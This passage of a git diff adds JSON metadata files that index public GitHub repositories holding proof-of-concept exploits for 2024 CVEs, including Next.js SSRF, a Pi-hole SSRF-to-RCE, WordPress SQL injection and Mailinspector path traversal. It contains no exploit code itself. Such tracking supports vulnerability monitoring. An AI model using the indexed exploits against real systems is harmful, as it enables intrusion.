"https:\/\/github.com\/pamoutaf\/CVE-2024-34329", + "description": null, + "fork": false, + "created_at": "2024-07-22T17:39:06Z", + "updated_at": "2024-07-22T17:39:24Z", + "pushed_at": "2024-07-22T17:39:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3435.json b/2024/CVE-2024-3435.json new file mode 100644 index 0000000000..076414db91 --- /dev/null +++ b/2024/CVE-2024-3435.json @@ -0,0 +1,33 @@ +[ + { + "id": 803069213, + "name": "cve-2024-3435", + "full_name": "ymuraki-csc\/cve-2024-3435", + "owner": { + "login": "ymuraki-csc", + "id": 119641175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119641175?v=4", + "html_url": "https:\/\/github.com\/ymuraki-csc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ymuraki-csc\/cve-2024-3435", + "description": null, + "fork": false, + "created_at": "2024-05-20T02:17:44Z", + "updated_at": "2024-05-20T02:17:54Z", + "pushed_at": "2024-05-20T02:17:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34350.json b/2024/CVE-2024-34350.json new file mode 100644 index 0000000000..20107ae00f --- /dev/null +++ b/2024/CVE-2024-34350.json @@ -0,0 +1,33 @@ +[ + { + "id": 820951653, + "name": "rewrites-nextjs-CVE-2024-34350", + "full_name": "Sudistark\/rewrites-nextjs-CVE-2024-34350", + "owner": { + "login": "Sudistark", + "id": 31372554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4", + "html_url": "https:\/\/github.com\/Sudistark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sudistark\/rewrites-nextjs-CVE-2024-34350", + "description": null, + "fork": false, + "created_at": "2024-06-27T14:00:34Z", + "updated_at": "2024-06-27T14:00:34Z", + "pushed_at": "2024-06-27T14:00:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34351.json b/2024/CVE-2024-34351.json new file mode 100644 index 0000000000..8260ff0904 --- /dev/null +++ b/2024/CVE-2024-34351.json @@ -0,0 +1,95 @@ +[ + { + "id": 799502114, + "name": "CVE-2024-34351", + "full_name": "Voorivex\/CVE-2024-34351", + "owner": { + "login": "Voorivex", + "id": 16985510, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16985510?v=4", + "html_url": "https:\/\/github.com\/Voorivex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Voorivex\/CVE-2024-34351", + "description": null, + "fork": false, + "created_at": "2024-05-12T10:49:41Z", + "updated_at": "2024-10-17T08:49:16Z", + "pushed_at": "2024-05-12T13:05:22Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813643412, + "name": "Next.js_exploit_CVE-2024-34351", + "full_name": "avergnaud\/Next.js_exploit_CVE-2024-34351", + "owner": { + "login": "avergnaud", + "id": 14194032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14194032?v=4", + "html_url": "https:\/\/github.com\/avergnaud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avergnaud\/Next.js_exploit_CVE-2024-34351", + "description": null, + "fork": false, + "created_at": "2024-06-11T13:19:18Z", + "updated_at": "2024-11-07T10:40:12Z", + "pushed_at": "2024-07-01T08:21:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848332085, + "name": "nextjs-CVE-2024-34351-_exploit", + "full_name": "God4n\/nextjs-CVE-2024-34351-_exploit", + "owner": { + "login": "God4n", + "id": 67663627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67663627?v=4", + "html_url": "https:\/\/github.com\/God4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/God4n\/nextjs-CVE-2024-34351-_exploit", + "description": "PoC for a full exploitation of NextJS SSRF (CVE-2024-34351)", + "fork": false, + "created_at": "2024-08-27T15:10:26Z", + "updated_at": "2024-12-13T19:24:09Z", + "pushed_at": "2024-08-27T15:21:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34361.json b/2024/CVE-2024-34361.json new file mode 100644 index 0000000000..6e53b87f6c --- /dev/null +++ b/2024/CVE-2024-34361.json @@ -0,0 +1,33 @@ +[ + { + "id": 825467646, + "name": "CVE-2024-34361-PiHole-SSRF-to-RCE", + "full_name": "T0X1Cx\/CVE-2024-34361-PiHole-SSRF-to-RCE", + "owner": { + "login": "T0X1Cx", + "id": 71453093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4", + "html_url": "https:\/\/github.com\/T0X1Cx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2024-34361-PiHole-SSRF-to-RCE", + "description": "This repository contains an exploit for CVE-2024-34361, a critical Pi-hole vulnerability (CVSS 8.6). It uses SSRF to achieve RCE by exploiting improper URL validation, allowing attackers to send arbitrary requests and execute commands on the system. Disclaimer: For educational and ethical security testing only. Unauthorized use is illegal.", + "fork": false, + "created_at": "2024-07-07T21:22:36Z", + "updated_at": "2024-10-12T15:18:59Z", + "pushed_at": "2024-07-07T21:41:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34452.json b/2024/CVE-2024-34452.json new file mode 100644 index 0000000000..25237537be --- /dev/null +++ b/2024/CVE-2024-34452.json @@ -0,0 +1,33 @@ +[ + { + "id": 817432934, + "name": "CVE-2024-34452", + "full_name": "surajhacx\/CVE-2024-34452", + "owner": { + "login": "surajhacx", + "id": 158517938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158517938?v=4", + "html_url": "https:\/\/github.com\/surajhacx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/surajhacx\/CVE-2024-34452", + "description": "Cross-Site Scripting (XSS) Vulnerability in CMSimple_XH", + "fork": false, + "created_at": "2024-06-19T17:38:49Z", + "updated_at": "2024-09-08T17:07:05Z", + "pushed_at": "2024-06-19T18:17:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34463.json b/2024/CVE-2024-34463.json new file mode 100644 index 0000000000..1a00e8b11d --- /dev/null +++ b/2024/CVE-2024-34463.json @@ -0,0 +1,33 @@ +[ + { + "id": 851102482, + "name": "CVE-2024-34463", + "full_name": "yash-chandna\/CVE-2024-34463", + "owner": { + "login": "yash-chandna", + "id": 46512916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46512916?v=4", + "html_url": "https:\/\/github.com\/yash-chandna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yash-chandna\/CVE-2024-34463", + "description": null, + "fork": false, + "created_at": "2024-09-02T12:33:33Z", + "updated_at": "2024-09-02T19:56:49Z", + "pushed_at": "2024-09-02T19:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34469.json b/2024/CVE-2024-34469.json new file mode 100644 index 0000000000..79d2e7032f --- /dev/null +++ b/2024/CVE-2024-34469.json @@ -0,0 +1,33 @@ +[ + { + "id": 797102726, + "name": "CVE-2024-34469", + "full_name": "Toxich4\/CVE-2024-34469", + "owner": { + "login": "Toxich4", + "id": 47368696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47368696?v=4", + "html_url": "https:\/\/github.com\/Toxich4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toxich4\/CVE-2024-34469", + "description": "CVE-2024-34469", + "fork": false, + "created_at": "2024-05-07T07:47:20Z", + "updated_at": "2024-05-07T14:10:01Z", + "pushed_at": "2024-05-07T09:24:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34470.json b/2024/CVE-2024-34470.json new file mode 100644 index 0000000000..0dc4a4eb8c --- /dev/null +++ b/2024/CVE-2024-34470.json @@ -0,0 +1,157 @@ +[ + { + "id": 796108085, + "name": "CVE-2024-34470", + "full_name": "osvaldotenorio\/CVE-2024-34470", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34470", + "description": null, + "fork": false, + "created_at": "2024-05-05T00:31:31Z", + "updated_at": "2024-07-01T11:39:25Z", + "pushed_at": "2024-05-05T00:52:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817279681, + "name": "CVE-2024-34470", + "full_name": "bigb0x\/CVE-2024-34470", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-34470", + "description": "POC and bulk scanner for CVE-2024-34470", + "fork": false, + "created_at": "2024-06-19T11:32:40Z", + "updated_at": "2024-12-17T20:19:30Z", + "pushed_at": "2024-06-19T21:22:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817593815, + "name": "CVE-2024-34470", + "full_name": "Cappricio-Securities\/CVE-2024-34470", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-34470", + "description": "HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion", + "fork": false, + "created_at": "2024-06-20T04:01:42Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-21T09:48:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 817890438, + "name": "CVE-2024-34470", + "full_name": "Mr-r00t11\/CVE-2024-34470", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-34470", + "description": null, + "fork": false, + "created_at": "2024-06-20T16:47:28Z", + "updated_at": "2024-10-05T16:51:37Z", + "pushed_at": "2024-06-20T18:30:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818833785, + "name": "CVE-2024-34470", + "full_name": "th3gokul\/CVE-2024-34470", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-34470", + "description": "CVE-2024-34470 : An Unauthenticated Path Traversal Vulnerability in HSC Mailinspector", + "fork": false, + "created_at": "2024-06-23T02:23:57Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-07-02T11:42:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34471.json b/2024/CVE-2024-34471.json new file mode 100644 index 0000000000..ab729652b8 --- /dev/null +++ b/2024/CVE-2024-34471.json @@ -0,0 +1,33 @@ +[ + { + "id": 796114303, + "name": "CVE-2024-34471", + "full_name": "osvaldotenorio\/CVE-2024-34471", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34471", + "description": null, + "fork": false, + "created_at": "2024-05-05T01:10:39Z", + "updated_at": "2024-05-05T01:20:27Z", + "pushed_at": "2024-05-05T01:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34472.json b/2024/CVE-2024-34472.json new file mode 100644 index 0000000000..826a7c6a2f --- /dev/null +++ b/2024/CVE-2024-34472.json @@ -0,0 +1,33 @@ +[ + { + "id": 796111814, + "name": "CVE-2024-34472", + "full_name": "osvaldotenorio\/CVE-2024-34472", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34472", + "description": null, + "fork": false, + "created_at": "2024-05-05T00:54:56Z", + "updated_at": "2024-05-05T01:09:42Z", + "pushed_at": "2024-05-05T01:09:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34474.json b/2024/CVE-2024-34474.json new file mode 100644 index 0000000000..3d881317fa --- /dev/null +++ b/2024/CVE-2024-34474.json @@ -0,0 +1,33 @@ +[ + { + "id": 796157445, + "name": "CVE-2024-34474", + "full_name": "Alaatk\/CVE-2024-34474", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-34474", + "description": " Clario through 2024-04-11 for Windows Desktop has weak permissions for %PROGRAMDATA%\\Clario and tries to load DLLs from there as SYSTEM.", + "fork": false, + "created_at": "2024-05-05T05:28:15Z", + "updated_at": "2024-07-30T20:02:53Z", + "pushed_at": "2024-05-05T05:37:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34582.json b/2024/CVE-2024-34582.json new file mode 100644 index 0000000000..5c722e58ca --- /dev/null +++ b/2024/CVE-2024-34582.json @@ -0,0 +1,33 @@ +[ + { + "id": 801543237, + "name": "CVE-2024-34582", + "full_name": "silent6trinity\/CVE-2024-34582", + "owner": { + "login": "silent6trinity", + "id": 78173918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78173918?v=4", + "html_url": "https:\/\/github.com\/silent6trinity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silent6trinity\/CVE-2024-34582", + "description": null, + "fork": false, + "created_at": "2024-05-16T12:40:46Z", + "updated_at": "2024-05-16T12:42:44Z", + "pushed_at": "2024-05-16T12:42:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34693.json b/2024/CVE-2024-34693.json new file mode 100644 index 0000000000..f8ed2f4288 --- /dev/null +++ b/2024/CVE-2024-34693.json @@ -0,0 +1,70 @@ +[ + { + "id": 834629281, + "name": "CVE-2024-34693", + "full_name": "mbadanoiu\/CVE-2024-34693", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-34693", + "description": "CVE-2024-34693: Server Arbitrary File Read in Apache Superset", + "fork": false, + "created_at": "2024-07-27T21:28:11Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-07-27T21:58:04Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "arbitrary-file-read", + "cve", + "cve-2024-34693", + "cves" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835883162, + "name": "CVE-2024-34693", + "full_name": "Mr-r00t11\/CVE-2024-34693", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-34693", + "description": null, + "fork": false, + "created_at": "2024-07-30T18:02:25Z", + "updated_at": "2024-07-30T18:07:54Z", + "pushed_at": "2024-07-30T18:07:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34716.json b/2024/CVE-2024-34716.json new file mode 100644 index 0000000000..675681307e --- /dev/null +++ b/2024/CVE-2024-34716.json @@ -0,0 +1,64 @@ +[ + { + "id": 800659974, + "name": "CVE-2024-34716", + "full_name": "aelmokhtar\/CVE-2024-34716", + "owner": { + "login": "aelmokhtar", + "id": 66908023, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66908023?v=4", + "html_url": "https:\/\/github.com\/aelmokhtar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aelmokhtar\/CVE-2024-34716", + "description": null, + "fork": false, + "created_at": "2024-05-14T18:48:41Z", + "updated_at": "2024-12-25T03:31:20Z", + "pushed_at": "2024-09-27T10:46:14Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 879884108, + "name": "Prestashop-CVE-2024-34716", + "full_name": "0xDTC\/Prestashop-CVE-2024-34716", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/Prestashop-CVE-2024-34716", + "description": null, + "fork": false, + "created_at": "2024-10-28T18:03:30Z", + "updated_at": "2025-01-07T12:51:47Z", + "pushed_at": "2025-01-07T12:51:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34739.json b/2024/CVE-2024-34739.json new file mode 100644 index 0000000000..90e76cc9a7 --- /dev/null +++ b/2024/CVE-2024-34739.json @@ -0,0 +1,33 @@ +[ + { + "id": 867557806, + "name": "CVE-2024-34739", + "full_name": "uthrasri\/CVE-2024-34739", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-34739", + "description": null, + "fork": false, + "created_at": "2024-10-04T09:40:59Z", + "updated_at": "2024-10-04T09:43:47Z", + "pushed_at": "2024-10-04T09:43:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34741.json b/2024/CVE-2024-34741.json new file mode 100644 index 0000000000..24e3880dac --- /dev/null +++ b/2024/CVE-2024-34741.json @@ -0,0 +1,33 @@ +[ + { + "id": 867664225, + "name": "CVE-2024-34741", + "full_name": "uthrasri\/CVE-2024-34741", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-34741", + "description": null, + "fork": false, + "created_at": "2024-10-04T13:41:09Z", + "updated_at": "2024-10-04T13:44:01Z", + "pushed_at": "2024-10-04T13:44:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34831.json b/2024/CVE-2024-34831.json new file mode 100644 index 0000000000..7d13c807a5 --- /dev/null +++ b/2024/CVE-2024-34831.json @@ -0,0 +1,33 @@ +[ + { + "id": 854315476, + "name": "CVE-2024-34831", + "full_name": "enzored\/CVE-2024-34831", + "owner": { + "login": "enzored", + "id": 4228172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4228172?v=4", + "html_url": "https:\/\/github.com\/enzored", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enzored\/CVE-2024-34831", + "description": "Disclosure of CVE-2024-34831", + "fork": false, + "created_at": "2024-09-08T23:58:09Z", + "updated_at": "2024-09-17T14:29:52Z", + "pushed_at": "2024-09-17T14:29:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34833.json b/2024/CVE-2024-34833.json new file mode 100644 index 0000000000..2f62866130 --- /dev/null +++ b/2024/CVE-2024-34833.json @@ -0,0 +1,33 @@ +[ + { + "id": 794975780, + "name": "CVE-2024-34833-payroll-management-system-rce", + "full_name": "ShellUnease\/CVE-2024-34833-payroll-management-system-rce", + "owner": { + "login": "ShellUnease", + "id": 145274712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145274712?v=4", + "html_url": "https:\/\/github.com\/ShellUnease", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShellUnease\/CVE-2024-34833-payroll-management-system-rce", + "description": null, + "fork": false, + "created_at": "2024-05-02T10:37:56Z", + "updated_at": "2024-08-11T21:59:37Z", + "pushed_at": "2024-08-11T21:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3495.json b/2024/CVE-2024-3495.json new file mode 100644 index 0000000000..29bad07899 --- /dev/null +++ b/2024/CVE-2024-3495.json @@ -0,0 +1,64 @@ +[ + { + "id": 804659512, + "name": "CVE-2024-3495-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3495-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3495-Poc", + "description": "CVE-2024-3495 Country State City Dropdown CF7 <= 2.7.2 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-23T02:41:15Z", + "updated_at": "2024-08-05T05:08:13Z", + "pushed_at": "2024-05-24T15:27:43Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806847761, + "name": "CVE-2024-3495-POC", + "full_name": "zomasec\/CVE-2024-3495-POC", + "owner": { + "login": "zomasec", + "id": 118324667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118324667?v=4", + "html_url": "https:\/\/github.com\/zomasec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zomasec\/CVE-2024-3495-POC", + "description": "The Country State City Dropdown CF7 WordPress plugin (versions up to 2.7.2) is vulnerable to SQL Injection via 'cnt' and 'sid' parameters. Insufficient escaping and lack of preparation in the SQL query allow unauthenticated attackers to append queries, potentially extracting sensitive database information.", + "fork": false, + "created_at": "2024-05-28T02:57:12Z", + "updated_at": "2024-07-03T11:41:08Z", + "pushed_at": "2024-05-28T02:57:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34958.json b/2024/CVE-2024-34958.json new file mode 100644 index 0000000000..dc9bf47262 --- /dev/null +++ b/2024/CVE-2024-34958.json @@ -0,0 +1,33 @@ +[ + { + "id": 803178565, + "name": "CVE-2024-34958", + "full_name": "Gr-1m\/CVE-2024-34958", + "owner": { + "login": "Gr-1m", + "id": 57427356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57427356?v=4", + "html_url": "https:\/\/github.com\/Gr-1m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gr-1m\/CVE-2024-34958", + "description": "idccms CSRF poc", + "fork": false, + "created_at": "2024-05-20T08:15:05Z", + "updated_at": "2024-06-03T04:59:09Z", + "pushed_at": "2024-06-03T04:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 